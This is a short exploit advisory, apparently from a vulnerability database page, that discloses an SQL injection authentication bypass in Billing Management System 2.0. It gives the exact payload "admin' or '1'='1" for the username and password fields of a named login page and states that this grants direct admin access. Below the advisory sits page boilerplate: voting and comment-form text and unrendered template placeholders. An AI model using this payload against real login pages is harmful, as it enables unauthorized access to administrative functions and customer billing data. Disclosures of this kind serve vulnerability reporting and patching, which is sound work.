Billing Management System 2.0 email SQL injection Auth Bypass

2021.02.17

Credit: Pintu Solanki

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

# Exploit Title: Billing Management System 2.0 - 'email' SQL injection Auth Bypass
# Date: 2021-02-16
# Exploit Author: Pintu Solanki
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/14380/billing-management-system-php-mysql-updated.html
# Software: Billing Management System 2.0
# Vulnerability Type: SQL injection - Auth Bypass
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
# This application is vulnerable to SQL injection vulnerability.
# Vulnerable Page: http://localhost/smartbilling/smartbilling_source_code/index.php
# Payload used:
Username => admin' or '1'='1
Password => admin' or '1'='1
# POC: Whenever we will go to the page (http://localhost/smartbilling/smartbilling_source_code/index.php) when we inject SQL Payload then we will directly enter into the admin page.

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Billing Management System 2.0 email SQL injection Auth Bypass

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.